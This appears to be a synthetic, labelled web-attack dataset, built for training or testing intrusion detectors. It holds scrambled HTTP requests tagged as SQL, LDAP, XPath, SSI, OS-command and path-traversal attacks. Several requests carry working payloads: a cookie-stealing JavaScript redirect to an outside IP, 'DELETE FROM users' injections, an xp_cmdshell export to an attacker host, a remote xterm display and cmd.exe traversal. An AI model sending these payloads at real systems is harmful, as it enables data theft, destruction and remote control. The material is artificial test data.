Accept-Encoding: 
Accept-Language: e-eil, vFoeod-osas, oe8Hnyef-ay;q=0.2
Cache-Control: min-fresh=14658
Client-ip: 202.152.82.23
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="4"
Date: Sun, 18 Apr 10 19:02:40 CET
ETag: "uvWwqLBwApGZcIhP"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Oct 09 09:58:38 GMT
Max-Forwards: 3218
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: 8eeq bSihE=Gspcil
Range: 462-
Referer: /lafsei.dll
TE: gzip,gzip;q=0.4
User-Agent: Mozilla/4.8 (X11; U; SunOS sun4u 4.9; bt-eh; rv:9.3.8) Gecko/02762112
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: p9loe; tn6hn=xuRtltbn
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
X-Serial-Number: 105971197314660
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

m7tt7dhhitow=yh2vW&enetyi8jlsct9e=7Ujnat5di ab9tt&9noaOaonridsm=<meta     http-equiv  =" refresh     "  content  = "  0;url=javascript:    [window.open('http://4.133.32.242/as.pl'+document.cookie);]  " >

End - Id: 46769
Start - Id: 36872
class: LdapInjection
GET /aF79f2_Xc0I8f00t0Lo/4B4Pircp8/NeJd48Vk-lG/hiyi/iidsa9THrdeT/ew.cfm?ChsK=eqil3slddropse HTTP/1.0
Host: www.sShIna.fr
Connection: kpaar
Accept: video/quicktime;q=0.5, video/mpeg;q=0.9
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: min-fresh=34491
Cookie2: $Version="453"
Max-Forwards: 4255
Authorization: rqnaa nO5mr=p5M5
Range: 61-79525,-28,952-1
Referer: /ebem1en/l3aech/3ne0Qhlo/tsidyt.gif
User-Agent: iiGUbepdoflTmsAte
UA-Color: color8
Warning: 452 www.sNwh.tiff "efdBlvesltsgnrb" 

null

End - Id: 36872
Start - Id: 41903
class: SqlInjection
GET /NtndyaGledCzJs3e/ad/jW4e3B.G.nsf?wlmgRvLg=9xmlyen&dggti1ldesdia=9100589&hyttsierhr=srexecrept7rm7ot&oLirreg=i9zaZ5&w9etpnCfA=n21H&N_lZZHSl=hVFNPgaz1Bd&aRLscript=6u%27Sz&nsimeawKhiT3un8=%27+%29%3B++delete+++from+++users%3B+++++commit%3B++++dummy%28%27&.C0TQ9W1Yp-=tiw&0ot=2C&sa3icSa4sOeh=ihDf&dl=mHy&eserrereec=aTv&7tuhNenn=5unal1Qtes2rSlc&ezp=e%3E6zds+%24 HTTP/1.1
Host: 134.156.109.172
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=76
Client-ip: 199.227.44.84
Cookie: hthmaeu=f5=;4t=i c;sw3eosarty=eket8Pepxmlstylehhband4
Cookie2: $Version="83"
Date: Sun, 02 Dec 07 19:47:43 CET
ETag: W/"BF8exgCDbUZQJgc3"
Expect: nvsci=uffmeHo
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "ibT.05BOLrmOiobA"
If-None-Match: *
If-Range: Sat, 15 Nov 08 11:01:21 UTC
Max-Forwards: 00
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest cnonce="rjl8"
Range: 814292-
Referer: /hRgifine.conf
TE: trailers
Trailer: Via
User-Agent: dtgouuDoirio
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: 1nfee/9.0 www.ztad.css
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41903
Start - Id: 42972
class: OsCommanding
GET /hoCkFz3Nh@RCFG3.Uk.js?@GGjechowO=b&ssshyrydstnt=%5Ceg&teepsu2enn7mahG=9820201755&ueqlTaudhosbt1=%29wheresformw&kel8Ah0oiMt7tf=91493&sxahabresfhh0i=4s&i4yeritrerk=22&jEutoWelRzy=xzir&thUnL8.k9=r%3E&5hognuhDb=hrod&ouhrla=32011801&vbscript967bgsounda=64003885&e0ujh=e&htedtua4ne=iGc%40&5uTa1=qirt%3Cayaccess_logooold HTTP/1.1
Host: 169.27.253.197
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.0, x-mac-arabic, ks_c_5601-1987;q=0.1
Accept-Encoding: 
Accept-Language: *
Cookie: hmdps=|   /usr/openwin/bin/xterm+-display+203.7.78.51:0%00;VQijZ=hdotoo;adts4rielhi=iritemtsdn
Date: Wed, 11 Feb 09 12:30:23 GMT
ETag: "rS5DWTH9-z0bcvV2"
If-Modified-Since: Tue, 29 Mar 05 20:14:10 GMT
If-Match: "65sQQAnIx211vLyHSxwA"
If-None-Match: "tMEHgcpAut@WPM47IhFG"
Max-Forwards: 88
MIME-Version: 5.2
Authorization: Basic RGV0OWFkOm9ucXRm
Referer: http://www.n2cop.com/hEd663/9hearlcj/xtlT8kr/arlyp.msf
TE: chunked;q=0.5
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 4.4; 4r-lc; rv:4.4.0) Gecko/75672437
Transfer-Encoding: identity
Upgrade: Cdqo/1.9, uerbii/0.1, rBrtd/7.5
Warning: 621 114.147.233.95:5 "oenOszaooNn6g1hEeE" 
X-Serial-Number: 6525102143
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42972
Start - Id: 45660
class: PathTransversal
GET /tTA/mjpdwx.XTSe9QpAa@z/k0.Auzg070Z98LdlM/@Vls4M/Ee1h/kMUuuWYakUerGgC.html?6h=sTmi%3EejformEl4Sto4&AHallf_eX3H7=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&n5oshEri=4351842764&Iee=2173&onlxsacyiaqmh=410793&eetocrlh1s=h&nEthOaienoSortt=neeq+slinkx&ewrm9edonIye4=o+&hEmjdaeolth=noh%2Br+elwhr4++idnh&eeaBpinyjfga=rg4lpD&3Estdinnph-P72L=owiqtknlppte0ilmh HTTP/1.1
Host: www.hcLoene4b.de
Connection: t4fe
Accept: text/xml, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 189.129.104.202
Cookie: soeatiyen3tf4m=);dsre1thtsoeSe=60792879;esasesdisiv=64672;ernueecodz0d=senn
Cookie2: $Version="46"
Date: Sat, 25 Sep 04 02:16:18 CET
ETag: W/"7x6zWK4vVBctAGUO"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Tue, 04 Apr 06 23:02:03 GMT
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: *
If-Range: "vNmF8IL10.OpTFwEh-Bh"
Max-Forwards: 35
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: NTLM ZWMzdGQ1Z2RnZTN1ZXdlbjBlMm90ZDc1eWhwZWh1Z24wZWVoT3RydDdl
Range: 92916-
Referer: /iMamet/v4oi/ootacir0.html
TE: trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: iiaNr64l/4.7.3.4
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: HTTP/0.2 www.ctwsqwsd.html, 0.0 www.snibRf.png:0
Transfer-Encoding: compress
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45660
Start - Id: 39160
class: SSI
GET /smhH/21L831HlAqJ7RIA/gOo0@VIhtacces/iLp@7/1Q@qrt4A/rGHLJP/46cr03in/ism3J-kMc7aA@/tD6Cesa/zfvc/mceq/3hzo9DM3MjcjHjN.shtml? HTTP/1.1
Host: www.areoL.uk:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 56.0.96.220
Cookie: CDvUpffJ4=Ace;Vrpi2qIkuT1=<!--   #exec cgi="/cgi-bin/script?uamc" -->;qloimo2eei=9hnbT;rmiowod=[;3-L7=32;alta=843248809
Date: Wed, 13 Feb 08 24:20:37 UTC
If-Modified-Since: Thu, 18 Nov 04 16:58:03 UTC
Authorization: tedfy e9eDr=pesnZ
Referer: http://elve4y.cz/diorH/iukiul/ym1l/sdfmno/yfaOnb4.nsf
TE: gzip
User-Agent: LJ2tifegoL/2.8.2.3
Via: HTTP/0.2 www.octsC1t.shtml
----: -------------

null

End - Id: 39160
Start - Id: 41754
class: SqlInjection
GET /a1cPa/m1GdvcfMI/y5mVlI/cmetrdr4kio/sz75UaetB/hliGnpMd1oRW.shtml?ho31hlwEn=++iecos5positionn&arTwtiugxsadtO=Shaeo2T%27++%29%3B++DELETE+FROM+users+++WHERE++upper%28username%29+%3D+++++upper%28%27admin&eeuotBAstb=hisr%3Dioraimtha&8a=%25h&etCoicw4=eoinnpcu3aD HTTP/1.1
Host: 183.197.158.212:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.1, deflate, gzip;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 122.67.58.101
Cookie: RHwnodeuZlyo=eNins~eean-c<tal:4o
Cookie2: $Version="2"
Date: Tue, 06 Apr 04 01:29:01 GMT
ETag: "4K2mazPqrLOm65B"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: *
If-None-Match: "bZkSgga4XYE2Gs59"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: n3isd braheurh=llinDn26
Range: -69404,-1
Referer: /gg4R/zpof4h.aspx
TE: trailers,gzip;q=0.9,chunked
Trailer: Cache-Control
User-Agent: Mozilla/5.7 (Windows; U; Win98 7.2; d8-oc; rv:9.9.0) Gecko/11895160
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8272x964
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: compress
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 486 www.rgnso.shtml:1 "waivD4wgcsuaoDeedtp" "Fri, 12 Feb 10 10:10:14 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41754
Start - Id: 42017
class: SqlInjection
GET /ZtSZpassthruOo/6uRM4sDWM/oyla4Eltoaiihirtaa/VBc00u2nwomehl5/ersTaCseeal5tt/ihe4yf1/croboacn/22oPzBlyBltaI.TjYRe/rto/6sloipe/bMbWKXpZ@dDFhz9tq2NU/erhnmeaniieqogy.gif?lto02hTa=OR+++++%27stis%27+++BETWEEN++%27R%27+++AND++%27T%27 HTTP/1.1
Host: 235.80.151.78:5436
Connection: keep-alive
Accept: text/plain, video/*;q=0.4, video/mpeg;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.9, x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: xtTxwe-oc;q=0.9, Neeso52g-784rmn2r;q=0.4, f-Dz, iu0o-lartd, rdTeace-hUadeei;q=0.5
Cache-Control: 9pe9Ue='tescze'
Client-ip: 61.190.31.71
Cookie: ldeeptxIH=va;-3YJmpr_=q;position9zTgCzW5=877
Cookie2: $Version="334"
Date: Fri, 27 Feb 04 07:09:03 CET
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: 2ltBltn8=r1t9hTn5
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 24 Feb 06 05:09:41 GMT
If-Unmodified-Since: Thu, 15 Jan 09 10:48:56 CET
If-Match: "Grhx@b@7p0VR3nv"
If-None-Match: *
If-Range: "eNZE@sxZvflBCrhC"
Max-Forwards: 0
MIME-Version: 2.8
Pragma: snO='lih'
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /dmju/ntohv/TfNu/hdihiv/gioucoat.txt
TE: gzip;q=0.4
Trailer: Date
User-Agent: een1h (n8U9m.Z01; aYmQe_WOG; pRj3Rl; aR9MNhLXtS)
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: HTTP/9.9 219.108.58.27, 5.0 www.isfe.js:7, FTP/7.0 74.204.27.126
Transfer-Encoding: ncge6; mb73t3n=nUkss
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42017
Start - Id: 49920
class: XPathInjection
GET /lDdfTj/riofGsshanshpn/tboI1hR@bNlCpWF/ovqYPZ/yhr/rboot.ini/Wsno/ttUMSL7UWK48ByTSUh/nra8velin/r4bLh@BNnmrS2kL8V/ndatnumeS2tqERrqee.css?4Errhicaae9aoer=ataAot8%27++++or+++++1%3C+++htn%2Fnc%2FAlhcss%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+or+%27ak%27+%3D%27 HTTP/1.0
Host: www.smnht.uk
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.6, gb2312;q=0.5, x-mac-ce
Accept-Encoding: compress, deflate;q=0.5
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: seoeanHquean=18714
Cookie2: $Version="455"
Date: Tue, 02 Aug 05 05:08:51 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: rmxetsnS@eaotitdn.com
If-Modified-Since: Sun, 31 Oct 04 22:31:48 UTC
If-Unmodified-Since: Fri, 21 Aug 09 03:31:53 UTC
If-Match: "u8H14rSiDEo18LeI"
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 26
MIME-Version: 8.6
Pragma: dhL=eot3in
Proxy-Authorization: Basic Z0lmcnFibGE6eHJ1ZXJvb24=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -983
Referer: http://www.tuAegg.gov/eFyc/e0lRo/ternst.aspx
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/6.3 (Windows; U; Win98 4.8; r6-yh; rv:1.9.0) Gecko/39310484
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: FTP/9.4 31.29.229.96:0
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.202.38.181
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49920
Start - Id: 43727
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: 90.229.220.34
Connection: oieRo2
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dU7aot-tle
Cache-Control: no-store
Client-ip: 200.212.238.89
Cookie: mlphva6t=e8LuepstoIvis;t3ogh9y4prd=bpftifeycIc;Sr=fvgpesm
Cookie2: $Version="6"
Date: Sun, 18 Apr 10 22:31:23 CET
ETag: "RPxc1_n2Ps@ZDg3I"
Expect: eiy7a
From: uhbqiisi@rmieagr.org
If-Modified-Since: Wed, 25 Oct 06 07:12:10 UTC
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "jHIL3cf8xKPp@wU"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 7696
MIME-Version: 8.3
Pragma: sijqefae=ooth3cs
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: /cgtsrm/hcibajez/Rhtrer/mArt.asmx
TE: chunked,trailers,chunked;q=0.3
User-Agent: ss3tanuxln (tt1rjQl; tI2t5Urah; enaUVp)
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43727
Start - Id: 42493
class: SqlInjection
GET /s_-tHUJw/mu@c5vKj2w1hobjectR-/rztyyt7LSRr/lez/oKnUCTmKV/nQk2I/sFHtowWNfG9QDgb@bQQ/8gM6v/Qfe6P8hiframeFMSS.f.tiff?ns=eshutdown&rcdCga7-=%3B+select+++++*+++++from+++OPENROWSET%28%27SQLoledb%27%2C%27uid%3D8dolce0%3Bpwd%3Dkt1tiDbHh%3BNetwork%3DDBMSSOCN%3BAddress%3D105.183.230.1%2C48611%3B%27%2C%27select+*++++from+++++oadoxIFetp%27+%29&r4wawnlmtNsuA=%7C%24%26a+bEr+aSam&c7s=567128922 HTTP/1.1
Host: www.aonaeor.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: min-fresh=8
Client-ip: 160.117.251.89
Cookie: ti5usa=e3$&5hrm;al=a06C;56CJMe0@0=nmw/7iurestdin;2n3dtqioyco=28181;ot=216
Cookie2: $Version="45"
Date: Wed, 16 Dec 09 18:35:15 CET
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sat, 13 Dec 08 22:31:16 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jun 05 01:03:43 GMT
Max-Forwards: 68
MIME-Version: 9.9
Pragma: sstby6ci='57Ylbtvo'
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: utooek cAhe=prlkCm
Range: 7-59040
Referer: http://www.4htlxSem.com/8tPe9neb/etensb/dte0t/so4UwcuN.cgi
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: rmueeei/5.7
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.0 www.zumt.gif, FTP/2.8 www.lenU4t9o.htm
Transfer-Encoding: beonz
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42493
Start - Id: 37813
class: LdapInjection
GET /passwdv.6TYBSGGs/1sbitteeosarh1yvuhnh/r6fEq9FP/nRx4l0Khy27L/6h/9or47M/vA/ftpP/f_dE/rp7mpW/teuiTlnsebamejqettwi/opendYExhttpwxz.msf?Dniofaoceha=+nytsIrlltM&inbsq0sh7on4ial=ruziyu8ezAsho&oG-MhonyjZ=%3De4gqatr5t&Ohcrgcrftt=70&h4ehb6Ue=uEaar%29%28%26%28objectClass+++%3D+ci*%29&rorqsh=114337&ioSitAQheLrwiw=21295000&RAhwaa2ziTsseud=aj&nn=658&pTX3zMN4MjX=sAodxdwbOS0L&emlreYusdnchr=gnavtoet%25ah&hanPetraset5ive=null-e&7te7Q=welzotoat&lonnut=mR7%40PZqe7X8P HTTP/1.0
Host: www.lrr2r.uk:37
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.2
Accept-Encoding: compress;q=0.0, gzip
Accept-Language: aoaiwtt-YSrnsi, eocosa2-thueh, u-Cmi;q=0.2, dtfe-nlHs
Cache-Control: no-transform
Client-ip: 172.140.190.216
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="09"
Date: Sun, 25 Oct 09 13:26:22 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: ztaaa=cfRocveh;Wateb=n7Ct5Til
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Tue, 21 Dec 04 01:40:49 CET
If-Unmodified-Since: Thu, 19 Aug 04 03:33:24 CET
If-Match: *
If-None-Match: "qdSIMPkMcHTsIBu"
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 2890
MIME-Version: 0.8
Pragma: uOraIe='taje'
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Digest algorithm=MD5
Range: 3012-675
Referer: http://tlai.fr/iaT1s/oe5s.asmx
TE: gzip,gzip;q=0.6,gzip
Trailer: Pragma
User-Agent: eeftsac1ol/4.1.4.5
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 7.1 www.dsotcea.tiff, 2.0 5.236.158.57
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37813
Start - Id: 48678
class: XPathInjection
PUT /eG/avNorsLderi/rueAo/m2ieeytutdhave/ic7kdgPRU/aD5@wwWBWCDHo/8lz0dT00f/ooonseapiorlstle/d5obgsoundxtermxEjV0gpQ/hrdv3heAqli/6A5CSFV.aFdml5iT/7lZAvFq1SDtys._a.png? HTTP/1.1
Content-Length: 310
Content-Language: eceit,p
Content-Encoding: compress
Content-Location: /cadnlrN/teugar/7wcknbna/piqnak.htm
Content-MD5: RVNpZWVwaG5udGhsNGxyeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Dec 09 07:54:57 UTC
Last-Modified: Sat, 02 Sep 06 13:24:33 GMT
Host: www.mgoteaa.be
Connection: eiE5
Accept: */*;q=0.2
Accept-Charset: windows-1254, x-mac-cyrillic;q=0.2, x-mac-japanese;q=0.5, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 108.91.253.160
Cookie: oAneOtxeiNilota=sa]jtshutdownh/s2;@jbJ=objecte;eoroEsea8=location;Rauleebitihbcia=w|;9ee2wetthwje=c4lnu:E
Cookie2: $Version="20"
Date: Tue, 27 Jan 09 21:03:51 CET
ETag: "3.OeJwn1snCY3-uU"
Expect: 100-continue
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: "AljuqJHrOSpuY3uYH9j1"
If-None-Match: *
If-Range: Tue, 10 Jul 07 20:02:20 CET
Max-Forwards: 8010
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2FyOWF0c2FBcjZTZ3lucGFlcG4yc2VlMmFtYWF3dWprdQ==
Authorization: Basic amg4c0VuczpodGgyaW5z
Range: 12-
Referer: /aaeD/Ezae/otlhm/1mfs.avi
TE: chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: I5ojvOetroys9ej
UA-CPU: MIPS
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/1.2 22.29.184.224, HTTP/2.0 44.128.131.106
Transfer-Encoding: identity
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 943 229.91.156.75 "nesehuesoC8tteHm" "Sat, 27 Dec 08 05:58:02 CET"
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bies=eu?&htniy=ysei&etaeewsni5iu=et'e0bgsoundi\2eii>eoSeaaor&oa=1sRevalk&aave2aa=235    or    count(path/child::node()[position()=((i+j+k+l+1)] |  path/child::*()[position()=(k+1)])=1     or  0559=&2aRRlnL8l8=oselecte)i&GAQyY=cPY3

End - Id: 48678
Start - Id: 41124
class: SqlInjection
GET /lGUfjtiM/hieeresmrhdott/eNDa/elTrytI2brm/q5Hqconnectj/nSA1kFHZ5KKD/rL4vm@8JUxa41eW/nr/htnX9/jhcmwmxlBlm6oeu.jpeg?4VGV4C1xG=0tvf&fr5i0i=sadwu1&ivbscriptMQBGNK=1.a&ep8on1flzCae=aaMSIt_eGRvO&astzlni=MensszhNWinS&8ktbV=exec+xp_cmdshell+%27bcp+%22select+++++*++++from+++++dd3lshr%22+++++queryout+pwdump.exe++++-c+++++-Craw+++-Shackersip+++++-Usa+++-Ph8ck3r%27 HTTP/1.1
Host: 63.217.230.191:80
Connection: keep-alive
Accept: image/jpeg;q=0.2
Accept-Charset: iso-8859-8;q=0.0, hz-gb-2312;q=0.1, x-mac-hebrew;q=0.9
Accept-Encoding: 
Accept-Language: wuo-ex20e, eotdmg-thmRjep;q=0.0, dtqgsor-tped
Cache-Control: max-stale
Client-ip: 104.85.29.24
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Cookie2: $Version="3"
Date: Wed, 25 Jun 08 16:44:48 CET
ETag: W/"2aTlPu50dA@UKfxeZq"
If-Modified-Since: Wed, 12 Mar 08 05:51:48 GMT
If-Unmodified-Since: Wed, 30 Aug 06 10:03:04 GMT
If-Match: "kKU@y4@a64U27TPTYa"
If-None-Match: *
If-Range: *
Max-Forwards: 07
Pragma: oz2s='ltryu'
Authorization: kknwh 9eoe8nl=fNaroe
Referer: http://Odhn.ch/ahtNhzef.aspx
User-Agent: n8nignnnry
UA-CPU: 68000
UA-Disp: 106,924,16
Via: 8.3 www.h0ahl.html, 1.5 7.15.158.106
Transfer-Encoding: io9f; twi4h=rem2lw
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41124
Start - Id: 44197
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 93.142.133.251:23912
Connection: fRr13eo
Accept: audio/*;q=0.3, audio/*, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ecoh-tAda;q=0.8, xehLeoe-erbpltae, l-eeeacws;q=0.6, cutlo-a, rrz541-idl;q=0.2
Cache-Control: no-cache
Client-ip: 130.86.46.202
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Tue, 02 Feb 10 07:32:07 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Tue, 09 Mar 10 14:19:14 CET
If-Unmodified-Since: Sat, 07 Jul 07 01:16:07 CET
If-Match: "djRGMp.zNHqbNUGOqNq"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.7
Pragma: tt=tpaiftrd
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest nonce
Range: 22399-
Referer: /ensiugi/ipzs5d/Sfnpn.msf
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: a4C8d6oFZv http://www.tyhhiT.be
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 700 www.yhebtw99.tiff "Igi9im" 
